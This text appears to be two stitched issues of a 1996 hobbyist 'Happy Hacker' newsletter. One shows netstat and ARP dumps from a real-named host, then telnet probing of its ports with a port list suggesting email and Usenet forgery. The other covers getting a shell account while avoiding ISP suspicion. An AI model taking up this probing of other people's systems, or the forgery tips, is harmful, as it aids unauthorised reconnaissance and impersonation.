198.59.136 LAWRII.NM.ORG Up,Gateway 0 1293 se0 1500
204.134.9 GLORY.NM.ORG Up,Gateway 0 21 se0 1500
204.134.73 GLORY.NM.ORG Up,Gateway 0 59794 se0 1500
129.138.0 GLORY.NM.ORG Up,Gateway 0 5262 se0 1500
192.92.10 LAWRII.NM.ORG Up,Gateway 0 163 se0 1500
206.206.75 LAWRII.NM.ORG Up,Gateway 0 604 se0 1500
207.66.13 GLORY.NM.ORG Up,Gateway 0 1184 se0 1500
204.134.77 LAWRII.NM.ORG Up,Gateway 0 3649 se0 1500
207.66.14 GLORY.NM.ORG Up,Gateway 0 334 se0 1500
204.134.78 GLORY.NM.ORG Up,Gateway 0 239 se0 1500
204.52.207 GLORY.NM.ORG Up,Gateway 0 293 se0 1500
204.134.79 GLORY.NM.ORG Up,Gateway 0 1294 se0 1500
192.160.144 LAWRII.NM.ORG Up,Gateway 0 117 se0 1500
206.206.80 PENNY.NM.ORG Up,Gateway 0 4663 se0 1500
204.134.80 GLORY.NM.ORG Up,Gateway 0 91 se0 1500
198.99.209 LAWRII.NM.ORG Up,Gateway 0 1136 se0 1500
207.66.17 GLORY.NM.ORG Up,Gateway 0 24173 se0 1500
204.134.82 GLORY.NM.ORG Up,Gateway 0 29766 se0 1500
192.41.211 GLORY.NM.ORG Up,Gateway 0 155 se0 1500
192.189.147 LAWRII.NM.ORG Up,Gateway 0 3133 se0 1500
204.134.84 PENNY.NM.ORG Up,Gateway 0 189 se0 1500
204.134.87 LAWRII.NM.ORG Up,Gateway 0 94 se0 1500
146.88.0 GLORY.NM.ORG Up,Gateway 0 140 se0 1500
192.84.24 GLORY.NM.ORG Up,Gateway 0 3530 se0 1500
204.134.88 LAWRII.NM.ORG Up,Gateway 0 136 se0 1500
198.49.217 GLORY.NM.ORG Up,Gateway 0 303 se0 1500
192.132.89 GLORY.NM.ORG Up,Gateway 0 3513 se0 1500
198.176.219 GLORY.NM.ORG Up,Gateway 0 1278 se0 1500
206.206.92 LAWRII.NM.ORG Up,Gateway 0 1228 se0 1500
192.234.220 129.121.1.91 Up,Gateway 0 2337 se0 1500
204.134.92 LAWRII.NM.ORG Up,Gateway 0 13995 se0 1500
198.59.157 LAWRII.NM.ORG Up,Gateway 0 508 se0 1500
206.206.93 GLORY.NM.ORG Up,Gateway 0 635 se0 1500
204.134.93 GLORY.NM.ORG Up,Gateway 0 907 se0 1500
198.59.158 LAWRII.NM.ORG Up,Gateway 0 14214 se0 1500
198.59.159 LAWRII.NM.ORG Up,Gateway 0 1806 se0 1500
204.134.95 PENNY.NM.ORG Up,Gateway 0 3644 se0 1500
206.206.96 GLORY.NM.ORG Up,Gateway 0 990 se0 1500
206.206.161 LAWRII.NM.ORG Up,Gateway 0 528 se0 1500
198.59.97 PENNY.NM.ORG Up,Gateway 0 55 se0 1500
198.59.161 LAWRII.NM.ORG Up,Gateway 0 497 se0 1500
192.207.226 GLORY.NM.ORG Up,Gateway 0 93217 se0 1500
198.59.99 PENNY.NM.ORG Up,Gateway 0 2 se0 1500
198.59.163 GLORY.NM.ORG Up,Gateway 0 3379 se0 1500
192.133.100 LAWRII.NM.ORG Up,Gateway 0 3649 se0 1500
204.134.100 GLORY.NM.ORG Up,Gateway 0 8 se0 1500
128.165.0 PENNY.NM.ORG Up,Gateway 0 15851 se0 1500
198.59.165 GLORY.NM.ORG Up,Gateway 0 274 se0 1500
206.206.165 LAWRII.NM.ORG Up,Gateway 0 167 se0 1500
206.206.102 GLORY.NM.ORG Up,Gateway 0 5316 se0 1500
160.230.0 LAWRII.NM.ORG Up,Gateway 0 19408 se0 1500
206.206.166 LAWRII.NM.ORG Up,Gateway 0 1756 se0 1500
205.166.231 GLORY.NM.ORG Up,Gateway 0 324 se0 1500
198.59.167 GLORY.NM.ORG Up,Gateway 0 1568 se0 1500
206.206.103 GLORY.NM.ORG Up,Gateway 0 3629 se0 1500
198.59.168 GLORY.NM.ORG Up,Gateway 0 9063 se0 1500
206.206.104 GLORY.NM.ORG Up,Gateway 0 7333 se0 1500
206.206.168 GLORY.NM.ORG Up,Gateway 0 234 se0 1500
204.134.105 LAWRII.NM.ORG Up,Gateway 0 4826 se0 1500
206.206.105 LAWRII.NM.ORG Up,Gateway 0 422 se0 1500
204.134.41 LAWRII.NM.ORG Up,Gateway 0 41782 se0 1500
206.206.169 GLORY.NM.ORG Up,Gateway 0 5101 se0 1500
204.134.42 GLORY.NM.ORG Up,Gateway 0 10761 se0 1500
206.206.170 GLORY.NM.ORG Up,Gateway 0 916 se0 1500
198.49.44 GLORY.NM.ORG Up,Gateway 0 3 se0 1500
198.59.108 GLORY.NM.ORG Up,Gateway 0 2129 se0 1500
204.29.236 GLORY.NM.ORG Up,Gateway 0 125 se0 1500
206.206.172 GLORY.NM.ORG Up,Gateway 0 5839 se0 1500
204.134.108 GLORY.NM.ORG Up,Gateway 0 3216 se0 1500
206.206.173 GLORY.NM.ORG Up,Gateway 0 374 se0 1500
198.175.173 LAWRII.NM.ORG Up,Gateway 0 6227 se0 1500
198.59.110 GLORY.NM.ORG Up,Gateway 0 1797 se0 1500
198.51.238 GLORY.NM.ORG Up,Gateway 0 1356 se0 1500
192.136.110 GLORY.NM.ORG Up,Gateway 0 583 se0 1500
204.134.48 GLORY.NM.ORG Up,Gateway 0 42 se0 1500
198.175.176 LAWRII.NM.ORG Up,Gateway 0 32 se0 1500
206.206.114 LAWRII.NM.ORG Up,Gateway 0 44 se0 1500
206.206.179 LAWRII.NM.ORG Up,Gateway 0 14 se0 1500
198.59.179 PENNY.NM.ORG Up,Gateway 0 222 se0 1500
198.59.115 GLORY.NM.ORG Up,Gateway 1 132886 se0 1500
206.206.181 GLORY.NM.ORG Up,Gateway 0 1354 se0 1500
206.206.182 SIENNA.NM.ORG Up,Gateway 0 16 se0 1500
206.206.118 GLORY.NM.ORG Up,Gateway 0 3423 se0 1500
206.206.119 GLORY.NM.ORG Up,Gateway 0 282 se0 1500
206.206.183 SIENNA.NM.ORG Up,Gateway 0 2473 se0 1500
143.120.0 LAWRII.NM.ORG Up,Gateway 0 123533 se0 1500
206.206.184 GLORY.NM.ORG Up,Gateway 0 1114 se0 1500
205.167.120 GLORY.NM.ORG Up,Gateway 0 4202 se0 1500
206.206.121 GLORY.NM.ORG Up,Gateway 1 71 se0 1500
129.121.0 GRANDE.NM.ORG Up 12 21658599 se0 1500
204.134.122 GLORY.NM.ORG Up,Gateway 0 195 se0 1500
204.134.58 GLORY.NM.ORG Up,Gateway 0 7707 se0 1500
128.123.0 GLORY.NM.ORG Up,Gateway 0 34416 se0 1500
204.134.59 GLORY.NM.ORG Up,Gateway 0 1007 se0 1500
204.134.124 GLORY.NM.ORG Up,Gateway 0 37160 se0 1500
206.206.124 LAWRII.NM.ORG Up,Gateway 0 79 se0 1500
206.206.125 PENNY.NM.ORG Up,Gateway 0 233359 se0 1500
204.134.126 GLORY.NM.ORG Up,Gateway 0 497 se0 1500
206.206.126 LAWRII.NM.ORG Up,Gateway 0 13644 se0 1500
204.69.190 GLORY.NM.ORG Up,Gateway 0 4059 se0 1500
206.206.190 GLORY.NM.ORG Up,Gateway 0 1630 se0 1500
204.134.127 GLORY.NM.ORG Up,Gateway 0 45621 se0 1500
206.206.191 GLORY.NM.ORG Up,Gateway 0 3574 se0 1500
MultiNet IPX Routing tables:
Destination Gateway Flags Refcnt Use Interface MTU
---------- ---------- ----- ------ ----- --------- ----
MultiNet ARP table:
Host Network Address Ethernet Address Arp Flags
-------------------------------------------- ---------------- ---------
GLORY.NM.ORG (IP 129.121.1.4) AA:00:04:00:61:D0 Temporary
[UNKNOWN] (IP 129.121.251.1) 00:C0:05:01:2C:D2 Temporary
NARANJO.NM.ORG (IP 129.121.1.56) 08:00:87:04:9F:42 Temporary
CHAMA.NM.ORG (IP 129.121.1.8) AA:00:04:00:0C:D0 Temporary
[UNKNOWN] (IP 129.121.251.5) AA:00:04:00:D2:D0 Temporary
LAWRII.NM.ORG (IP 129.121.254.10) AA:00:04:00:5C:D0 Temporary
[UNKNOWN] (IP 129.121.1.91) 00:C0:05:01:2C:D2 Temporary
BRAVO.NM.ORG (IP 129.121.1.6) AA:00:04:00:0B:D0 Temporary
PENNY.NM.ORG (IP 129.121.1.10) AA:00:04:00:5F:D0 Temporary
ARRIBA.NM.ORG (IP 129.121.1.14) 08:00:2B:BC:C1:A7 Temporary
AZUL.NM.ORG (IP 129.121.1.51) 08:00:87:00:A1:D3 Temporary
ENSS365.NM.ORG (IP 129.121.1.3) 00:00:0C:51:EF:58 Temporary
AVATAR.NM.ORG (IP 129.121.254.1) 08:00:5A:1D:52:0D Temporary
[UNKNOWN] (IP 129.121.253.2) 08:00:5A:47:4A:1D Temporary
[UNKNOWN] (IP 129.121.254.5) 00:C0:7B:5F:5F:80 Temporary
CONCHAS.NM.ORG (IP 129.121.1.11) 08:00:5A:47:4A:1D Temporary
[UNKNOWN] (IP 129.121.253.10) AA:00:04:00:4B:D0 Temporary
MultiNet Network Interface statistics:
Name Mtu Network Address Ipkts Ierrs Opkts Oerrs Collis
---- --- ------- -------------- ----- ----- ----- ----- ------
se0 1500 129.121.0 GRANDE.NM.ORG 68422948 0 53492833 1 0
lo0 4136 127.0.0 127.0.0.1 1188191 0 1188191 0 0
MultiNet Protocol statistics:
65264173 IP packets received
22 IP packets smaller than minimum size
6928 IP fragments received
4 IP fragments timed out
34 IP received for unreachable destinations
704140 ICMP error packets generated
9667 ICMP opcodes out of range
4170 Bad ICMP packet checksums
734363 ICMP responses
734363 ICMP "Echo" packets received
734363 ICMP "Echo Reply" packets sent
18339 ICMP "Echo Reply" packets received
704140 ICMP "Destination Unreachable" packets sent
451243 ICMP "Destination Unreachable" packets received
1488 ICMP "Source Quench" packets received
163911 ICMP "ReDirect" packets received
189732 ICMP "Time Exceeded" packets received
126966 TCP connections initiated
233998 TCP connections established
132611 TCP connections accepted
67972 TCP connections dropped
28182 embryonic TCP connections dropped
269399 TCP connections closed
10711838 TCP segments timed for RTT
10505140 TCP segments updated RTT
3927264 TCP delayed ACKs sent
666 TCP connections dropped due to retransmit timeouts
111040 TCP retransmit timeouts
3136 TCP persist timeouts
9 TCP persist connection drops
16850 TCP keepalive timeouts
1195 TCP keepalive probes sent
14392 TCP connections dropped due to keepalive timeouts
28842663 TCP packets sent
12714484 TCP data packets sent
1206060086 TCP data bytes sent
58321 TCP data packets retransmitted
22144036 TCP data bytes retransmitted
6802199 TCP ACK-only packets sent
1502 TCP window probes sent
483 TCP URG-only packets sent
8906175 TCP Window-Update-only packets sent
359509 TCP control packets sent
38675084 TCP packets received
28399363 TCP packets received in sequence
1929418386 TCP bytes received in sequence
25207 TCP packets with checksum errors
273374 TCP packets were duplicates
230525708 TCP bytes were duplicates
3748 TCP packets had some duplicate bytes
493214 TCP bytes were partial duplicates
2317156 TCP packets were out of order
3151204672 TCP bytes were out of order
1915 TCP packets had data after window
865443 TCP bytes were after window
5804 TCP packets for already closed connection
941 TCP packets were window probes
10847459 TCP packets had ACKs
222657 TCP packets had duplicate ACKs
1 TCP packet ACKed unsent data
1200274739 TCP bytes ACKed
141545 TCP packets had window updates
13 TCP segments dropped due to PAWS
4658158 TCP segments were predicted pure-ACKs
24033756 TCP segments were predicted pure-data
8087980 TCP PCB cache misses
305 Bad UDP header checksums
17 Bad UDP data length fields
23772272 UDP PCB cache misses
MultiNet Buffer Statistics:
388 out of 608 buffers in use:
30 buffers allocated to Data.
10 buffers allocated to Packet Headers.
66 buffers allocated to Socket Structures.
57 buffers allocated to Protocol Control Blocks.
163 buffers allocated to Routing Table Entries.
2 buffers allocated to Socket Names and Addresses.
48 buffers allocated to Kernel Fork-Processes.
2 buffers allocated to Interface Addresses.
1 buffer allocated to Multicast Addresses.
1 buffer allocated to Timeout Callbacks.
6 buffers allocated to Memory Management.
2 buffers allocated to Network TTY Control Blocks.
11 out of 43 page clusters in use.
11 CXBs borrowed from VMS device drivers
2 CXBs waiting to return to the VMS device drivers
162 Kbytes allocated to MultiNet buffers (44% in use).
226 Kbytes of allocated buffer address space (0% of maximum).
Connection closed by foreign host.
<slug> [68] ->
Whoa! What was all that?
What we did was telnet to port 15 -- the netstat (network statistics)
port-- which on some computers runs a daemon that tells anybody who cares
to drop in just about everything about the connections made by all the
computers linked to the Internet through this computer.
So from this we learned two things:
1) Grande.nm.org is a very busy and important computer.
2) Even a very busy and important computer can let the random port surfer
come and play.
So my lady friend wanted to try out another port. I suggested the finger
port, number 79. So she gave the command:
<slug> [68] ->telnet grande.nm.org 79
Trying 129.121.1.2 ...
Connected to grande.nm.org.
Escape character is '^]'.
finger
?Sorry, could not find "FINGER"
Connection closed by foreign host.
<slug> [69] ->telnet grande.nm.org 79
Trying 129.121.1.2 ...
Connected to grande.nm.org.
Escape character is '^]'.
help
?Sorry, could not find "HELP"
Connection closed by foreign host.
<slug> [69] ->telnet grande.nm.org 79
Trying 129.121.1.2 ...
Connected to grande.nm.org.
Escape character is '^]'.
?
?Sorry, could not find "?"
Connection closed by foreign host.
<slug> [69] ->telnet grande.nm.org 79
Trying 129.121.1.2 ...
Connected to grande.nm.org.
Escape character is '^]'.
man
?Sorry, could not find "MAN"
Connection closed by foreign host.
<slug> [69] ->
At first this looks like just a bunch of failed commands. But actually this
is pretty fascinating. The reason is that port 79 is, under IETF rules,
supposed to run fingerd, the finger daemon. So when she gave the command
"finger" and grande.nm.org said ?Sorry, could not find "FINGER," we knew
this port was not following IETF rules.
Now on may computers they don't run the finger daemon at all. This is
because finger has so properties that can be used to gain total control of
the computer that runs it.
But if finger is shut down, and nothing else is running on port 79, we
should get the answer:
telnet: connect: Connection refused.
But instead we got connected and grande.nm.org was waiting for a command.
Now the normal thing a port surfer does when running an unfamiliar daemon
is to coax it into revealing what commands it uses. "Help," "?" and "man"
often work. But these didn't help us.
But even though these commands didn't help us, they did tell us that the
daemon is probably something sensitive. If it were a daemon that was meant
for anybody and his brother to use, it would have given us instructions.
So what did we do next? We decided to be good Internet citizens and also
stay out of jail. We decided we'd beter log off.
But there was one hack we decided to do first: leave our mark on the shell
log file.
The shell log file keeps a record of all operating system commands made on a
computer. The administrator of an obviously important computer such as
grande.nm.org is probably competent enough to scan the records of what
commands are given by whom to his computer. Especially on a port important
enough to be running a mystery, non-IETF daemon. So everything we typed
while connected was probably saved on a log.
So my friend giggled and left a few messages on port 79 before logging
off. Oh, dear, I do believe she's hooked on hacking. What a good way to
meet cute sysadmins...
So, port surf's up! If you want to surf, here's the basics:
1) Get logged onto a shell account. That's an account with your ISP that
lets you give Unix commands. Or -- run Linux or some other kind of Unix on
your PC and hook up to the Internet.
2) Give the command "telnet <hostname> <port number>" where <hostname> is the
internet address of the computer you wnat to visit and <port number> is
whatever looks phun to you.
3) If you get the response "connected to <hostname>," then surf's up!
Following are some of my favorite ports. It is legal and harmless to pay
them visits so long as you don't figure out how to gain superuser status
while playing with them. However, please note that if you do too much port
surfing from your shell account, your sysadmin may notice this in his or her
shell log file. Or, the sysadfmin of your target computer may report you
to your sysadmin. Yau will be identifieable by the headers on the packets
carrying your commands to the target computer. Then if your sysadmin is
kicked off your ISP. So you may want to explain in advance that you are
merely a harmless hacker looking to have a good time, er, um, learn about
Unix. Yeh, that sounds good...
Port number Service Why it's phun!
7 echo Whatever you type in, the host repeats back to you
9 discard Dev/null -- how fast can you figure out this one?
11 systat Lots of info on users
13 daytime Time and date at computer's location
15 netstat Tremendous info on networks
19 chargen Pours out a stream of ASCII characters. Use ^C to stop.
21 ftp Transfers files
23 telnet Where you log in.
25 smpt Forge email from Bill.Gates@Microsoft.org.
37 time Time
39 rlp Resource location
43 whois Info on hosts and networks
53 domain Nameserver
70 gopher Out-of-date info hunter
79 finger Lots of info on users
80 http Web server
110 pop Incoming email
119 nntp Usenet news groups -- forge posts, cancels
443 shttp Another web server
512 biff Mail notification
513 rlogin Remote login
who Remote who and uptime
514 shell Remote command, no password used!
syslog Remote system logging
520 route Routing information protocol
**************************
Propeller head tip: Note that in most cases an Internet host will use these
port number assignments for these services. More than one service may also
be assigned simultaneously to the same port. This numbering system is
voluntarily offered by the Internet Engineering Task Force (IETF). That
means that an Internet host may use other ports for these services. Expect
the unexpected!
If you have a copy of Linux, you can get the list of all the IETF
assignments of port numbers in the file /etc/services.
***************************
_________________________________________________________
Want to see back issues of Guide to (mostly) Harmless Hacking? See
http://www.feist.com/~tqdb/evis-unv.html. Want to subscribe to this list?
Email majordomo@edm.net with the message "subscribe happyhacker." Want to
share some kewl stuph with the Happy Hacker list? Send your messages to
hh@edm.net. To send me confidential email (please, no discussions of
illegal activities) use cmeinel@techbroker.com. Please direct flames to
dev/null@techbroker.com. Happy hacking!
Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly)
HARMLESS HACKING as long as you leave this notice at the end..
________________________________________________________
--------------------------------------------------------------------
This message is from the HappyHacker mailing list. To unsubscribe,
send mail to
+524
View File
@@ -0,0 +1,524 @@
___________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Beginners Series #3 Part 1
How to Get a *Good* Shell Account
____________________________________________________________
______________________________________________________________
In this section you will learn how to:
· tell whether you may already have a Unix shell account
· get a shell account
· log on to your shell account
_______________________________________________________________
Youve fixed up your Windows box to boot up with a lurid hacker logo. Youve
renamed “Recycle Bin” “Hidden Haxor Secrets.” When you run Netscape or
Internet Explorer, instead of that boring corporate logo, you have a
full-color animated Mozilla destroying New York City. Now your friends and
neighbors are terrified and impressed.
But in your heart of hearts you know Windows is scorned by elite hackers.
You keep on seeing their hairy exploit programs and almost every one of them
requires the Unix operating system. You realize that when it comes to
messing with computer networks, Unix is the most powerful operating system
on the planet. You have developed a burning desire to become one of those
Unix wizards yourself. Yes, youre ready for the next step.
Youre ready for a shell account. SHELL ACCOUNT!!!!
*****************************************************
Newbie note: A shell account allows you to use your home computer as a
terminal on which you can give commands to a computer running Unix. The
“shell” is the program that translates your keystrokes into Unix commands.
With the right shell account you can enjoy the use of a far more powerful
workstation than you could ever dream of affording to own yourself. It also
is a great stepping stone to the day when you will be running some form of
Unix on your home computer.
*****************************************************
Once upon a time the most common way to get on the Internet was through a
Unix shell account. But nowadays everybody and his brother are on the
Internet. Almost all these swarms of surfers want just two things: the Web,
and email. To get the pretty pictures of todays Web, the average Internet
consumer wants a mere PPP (point to point) connection account. They wouldnt
know a Unix command if it hit them in the snoot. So nowadays almost the only
people who want shell accounts are us wannabe hackers.
The problem is that you used to be able to simply phone an ISP, say “Id
like a shell account,” and they would give it to you just like that. But
nowadays, especially if you sound like a teenage male, youll run into
something like this:
ISP guy: “You want a shell account? What for?”
Hacker dude: “Um, well, I like Unix.”
“Like Unix, huh? Youre a hacker, arent you!” Slam, ISP guy hangs up on you.
So how do you get a shell account? Actually, its possible you may already
have one and not know it. So first we will answer the question, how do you
tell whether you may already have a shell account? Then, if you are certain
you dont have one, well explore the many ways you can get one, no matter
what, from anywhere in the world.
How Do I Know Whether I Already Have a Shell Account?
First you need to get a program running that will connect you to a shell
account. There are two programs with Windows 95 that will do this, as well
as many other programs, some of which are excellent and free.
First we will show you how to use the Win 95 Telnet program because you
already have it and it will always work. But its a really limited program,
so I suggest that you use it only if you cant get the Hyperterminal
program to work.
1) Find your Telnet program and make a shortcut to it on your desktop.
· One way is to click Start, then Programs, then Windows Explorer.
· When Explorer is running, first resize it so it doesnt cover the entire
desktop.
· Then click Tools, then Find, then “Files or Folders.”
· Ask it to search for “Telnet.”
· It will show a file labeled C:\windows\telnet (instead of C:\ it may have
another drive). Right click on this file.
· This will bring up a menu that includes the option “create shortcut.”
Click on “create shortcut” and then drag the shortcut to the desktop and
drop it.
· Close Windows Explorer.
2) Depending on how your system is configured, there are two ways to connect
to the Internet. The easy way is to skip to step three. But if it fails, go
back to this step. Start up whatever program you use to access the Internet.
Once you are connected, minimize the program. Now try step three.
3) Bring up your Telnet program by double clicking on the shortcut you just
made.
· First you need to configure Telnet so it actually is usable. On the
toolbar click “terminal,” then “preferences,” then “fonts.” Choose “Courier
New,” “regular” and 8 point size. You do this because if you have too big a
font, the Telnet program is shown on the screen so big that the cursor from
your shell program can end up being hidden off the screen. OK, OK, you can
pick other fonts, but make sure that when you close the dialog box that the
Telnet program window is entirely visible on the screen. Now why would there
be options that make Telnet impossible to use? Ask Microsoft.
· Now go back to the task bar to click Connect, then under it click “Remote
system.” This brings up another dialog box.
· Under “host name” in this box type in the last two parts of your email
address. For example, if your email address is jane_doe@boring.ISP.com, type
“ISP.com” for host name.
· Under “port” in this box, leave it the way it is, reading “telnet.”
· Under “terminal type,” in this box, choose “VT100.”
· Then click the Connect button and wait to see what happens.
· If the connection fails, try entering the last three parts of your email
address as the host, in this case “boring.ISP.com.”
Now if you have a shell account you should next get a message asking you to
login. It may look something like this:
Welcome to Boring Internet Services, Ltd.
Boring.com S9 - login: cmeinel
Password:
Linux 2.0.0.
Last login: Thu Apr 10 14:02:00 on ttyp5 from pm20.kitty.net.
sleepy:~$
If you get something like this you are in definite luck. The important thing
here, however, is that the computer used the word “login” to get you
started. If is asked for anything else, for example “logon,” this is not a
shell account.
As soon as you login, in the case of Boring Internet Services you have a
Unix shell prompt on your screen. But instead of something this simple you
may get something like:
BSDI BSD/OS 2.1 (escape.com) (ttyrf)
login: galfina
Password:
Last login: Thu Apr 10 16:11:37 from fubar.net
Copyright 1992, 1993, 1994, 1995 Berkeley Software Design, Inc.
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.
__________________________________________________________________
___________________ ______ ______________
___ / ___/ ___/ \/ \/ __ / ___/
_____ / ___/\__ / /__/ / / /___/ ___/
_______ / / / / / / / / / / / /
_________ \_____/\_____/\_____/\__/___/\_/ \_____/ .com
[ ESCAPE.COM ]
__________________________________________________________________
PLEASE NOTE:
Multiple Logins and Simultaneous Dialups From Different Locations Are
_NOT_ Permitted at Escape Internet Access.
__________________________________________________________________
Enter your terminal type, RETURN for vt100, ? for list:
Setting terminal type to vt100.
Erase is backspace.
MAIN
Escape Main Menu
----[05:45PM]-----------------------------------------------------
==> H) HELP Help & Tips for the Escape Interface. (M)
I) INTERNET Internet Access & Resources (M)
U) USENETM Usenet Conferences (Internet Distribution) (M)
L) LTALK Escape Local Communications Center (M)
B) BULLETINS Information on Escape, Upgrades, coming events. (M)
M) MAIL Escape World Wide and Local Post Office (M)
F) HOME Your Home Directory (Where all your files end up)
C) CONFIG Config your user and system options (M)
S) SHELL The Shell (Unix Environment) [TCSH]
X) LOGOUT Leave System
BACK MAIN HOME MBOX ITALK LOGOUT
----[Mesg: Y]------------[ TAB key toggles menus ]-------[Connected: 0:00]---
CMD>
In this case you arent in a shell yet, but you can see an option on the
menu to get to a shell. So hooray, you are in luck, you have a shell
account. Just enter “S” and youre in.
Now depending on the ISP you try out, there may be all sorts of different
menus, all designed to keep the user from having to ever stumble across the
shell itself. But if you have a shell account, you will probably find the
word “shell” somewhere on the menu.
If you dont get something obvious like this, you may have to do the single
most humiliating thing a wannabe hacker will ever do. Call tech support and
ask whether you have a shell account and, if so, how to login. It may be
that they just want to make it really, really hard for you to find your
shell account.
Now personally I dont care for the Win 95 Telnet program. Fortunately there
are many other ways to check whether you have a shell account. Heres how to
use the Hyperterminal program, which, like Telnet, comes free with the
Windows 95 operating system. This requires a different kind of connection.
Instead of a PPP connection we will do a simple phone dialup, the same sort
of connection you use to get on most computer bulletin board systems (BBS).
1) First, find the program Hyperteminal and make a shortcut to your desktop.
This one is easy to find. Just click Start, then Programs, then Accessories.
Youll find Hyperterminal on the accessories menu. Clicking on it will bring
up a window with a bunch of icons. Click on the one labeled
“hyperterminal.exe.”
2) This brings up a dialog box called “New Connection.” Enter the name of
your local dialup, then in the next dialog box enter the phone dialup number
of your ISP.
3) Make a shortcut to your desktop.
4) Use Hyperterminal to dial your ISP. Note that in this case you are making
a direct phone call to your shell account rather than trying to reach it
through a PPP connection.
Now when you dial your ISP from Hyperterminal you might get a bunch of
really weird garbage scrolling down your screen. But dont give up. What is
happening is your ISP is trying to set up a PPP connection with
Hyperterminal. That is the kind of connection you need in order to get
pretty pictures on the Web. But Hyperterminal doesnt understand PPP.
Unfortunately Ive have not been able to figure out why this happens
sometimes or how to stop it. But the good side of this picture is that the
problem may go away the next time you use Hyperterminal to connect to your
ISP. So if you dial again you may get a login sequence. Ive found it often
helps to wait a few days and try again. Of course you can complain to tech
support at your ISP. But it is likely that they wont have a clue on what
causes their end of things to try to set up a PPP session with your
Hyperterminal connection. Sigh.
But if all goes well, you will be able to log in. In fact, except for the
PPP attempt problem, I like the Hyperterminal program much better than Win
95 Telnet. So if you can get this one to work, try it out for awhile. See if
you like it, too.
There are a number of other terminal programs that are really good for
connecting to your shell account. They include Qmodem, Quarterdeck Internet
Suite, and Bitcom. Jericho recommends Ewan, a telnet program which also runs
on Windows 95. Ewan is free, and has many more features than either
Hyperterminal or Win 95 Telnet. You may download it from jerichos ftp site
at sekurity.org in the /utils directory.
OK, lets say you have logged into your ISP with your favorite program. But
perhaps it still isnt clear whether you have a shell account. Heres your
next test. At what you hope is your shell prompt, give the command “ls
-alF.” If you have a real, honest-to-goodness shell account, you should get
something like this:
> ls -alF
total 87
drwx--x--x 5 galfina user 1024 Apr 22 21:45 ./
drwxr-xr-x 380 root wheel 6656 Apr 22 18:15 ../
-rw-r--r-- 1 galfina user 2793 Apr 22 17:36 .README
-rw-r--r-- 1 galfina user 635 Apr 22 17:36 .Xmodmap
-rw-r--r-- 1 galfina user 624 Apr 22 17:36 .Xmodmap.USKBD
-rw-r--r-- 1 galfina user 808 Apr 22 17:36 .Xresources
drwx--x--x 2 galfina user 512 Apr 22 17:36 www/
etc.
This is the listing of the files and directories of your home directory.
Your shell account may give you a different set of directories and files
than this (which is only a partial listing). In any case, if you see
anything that looks even a little bit like this, congratulations, you
already have a shell account!
*******************************************************
Newbie note: The first item in that bunch of dashes and letters in front of
the file name tells you what kind of file it is. “d” means it is a
directory, and “-” means it is a file. The rest are the permissions your
files have. “r” = read permission, “w” = write permission, and “x” = execute
permission (no, “execute” has nothing to do with murdering files, it means
you have permission to run the program that is in this file). If there is a
dash, it means there is no permission there.
The symbols in the second, third and fourth place from the left are the
permissions that you have as a user, the following three are the permissions
everyone in your designated group has, and the final three are the
permissions anyone and everyone may have. For example, in galfinas
directory the subdirectory “www/” is something you may read, write and
execute, while everyone else may only execute. This is the directory where
you can put your Web page. The entire world may browse (“execute”) your Web
page. But only you can read and write to it.
If you were to someday discover your permissions looking like:
drwx--xrwx newbie user 512 Apr 22 17:36 www/
Whoa, that “r” in the third place from last would mean anyone can hack your
Web page!
******************************************************
Another command that will tell you whether you have a shell account is
“man.” This gives you an online Unix manual. Usually you have to give the
man command in the form of “man <command>“ where <command> is the name of
the Unix command you want to study. For example, if you want to know all
the different ways to use the “ls” command, type “man ls” at the prompt.
On the other hand, here is an example of something that, even though it is
on a Unix system, is not a shell account:
BSDI BSD/386 1.1 (dub-gw-2.compuserve.com) (ttyp7)
Connected to CompuServe
Host Name: cis
Enter choice (LOGON, HELP, OFF):
The immediate tip-off that this is not a shell account is that it asks you
to “logon” instead of “login:”
How to Get a Shell Account
What if you are certain that you dont already have a shell account? How do
you find an ISP that will give you one?
The obvious place to start is your phone book. Unless you live in a really
rural area or in a country where there are few ISPs, there should be a
number of companies to choose from.
So heres your problem. You phone Boring ISP, Inc. and say, “Id like a
shell account.” But Joe Dummy on the other end of the phone says, “Shell?
Whats a shell account?” You say “I want a shell account. SHELL ACCOUNT!!!”
He says, “Duh?” You say “Shell account. SHELL ACCOUNT!!!” He says, “Um, er,
let me talk to my supervisor.” Mr. Uptight Supervisor gets on the phone. “We
dont give out shell accounts, you dirty &%$*# hacker.”
Or, worse yet, they claim the Internet access account they are giving you a
shell account but you discover it isnt one.
To avoid this embarrassing scene, avoid calling big name ISPs. I can
guarantee you, America Online, Compuserve and Microsoft Network dont give
out shell accounts.
What you want to find is the seediest, tiniest ISP in town. The one that
specializes in pasty-faced customers who stay up all night playing MOOs and
MUDs. Guys who impersonate grrrls on IRC. Now that is not to say that MUD
and IRC people are typically hackers. But these definitely are your serious
Internet addicts. An ISP that caters to people like that probably also
understands the kind of person who wants to learn Unix inside and out.
So you phone or email one of these ISPs on the back roads of the Net and
say, “Greetings, d00d! I am an evil haxor and demand a shell account pronto!”
No, no, no! Chances are you got the owner of this tiny ISP on the other end
of the line. Hes probably a hacker himself. Guess what? He loves to hack
but he doesnt want hackers (or wannabe hackers) for customers. He doesnt
want a customer whos going to be attracting email bombers and waging hacker
war and drawing complaints from the sysadmins on whom this deadly dude has
been testing exploit code.
So what you do is say something like “Say, do you offer shell accounts? I
really, really like to browse the Web with lynx. I hate waiting five hours
for all those pretty pictures and Java applets to load. And I like to do
email with Pine. For newsgroups, I luuuv tin!”
Start out like this and the owner of this tiny ISP may say something like,
“Wow, dude, I know what you mean. IE and Netscape really s***! Lynx uber
alles! What user name would you like?”
At this point, ask the owner for a guest account. As you will learn below,
some shell accounts are so restricted that they are almost worthless.
But lets say you cant find any ISP within reach of a local phone call that
will give you a shell account. Or the only shell account you can get is
worthless. Or you are well known as a malicious hacker and youve been
kicked off every ISP in town. What can you do?
Your best option is to get an account on some distant ISP, perhaps even in
another country. Also, the few medium size ISPs that offer shell accounts
(for example, Netcom) may even have a local dialup number for you. But if
they dont have local dialups, you can still access a shell account located
*anywhere* in the world by setting up a PPP connection with your local
dialup ISP, and then accessing your shell account using a telnet program on
your home computer.
*************************************************
Evil Genius Tip: Sure, you can telnet into your shell account from another
ISP account. But unless you have software that allows you to send your
password in an encrypted form, someone may sniff your password and break
into your account. If you get to be well known in the hacker world, lots of
other hackers will constantly be making fun of you by sniffing your
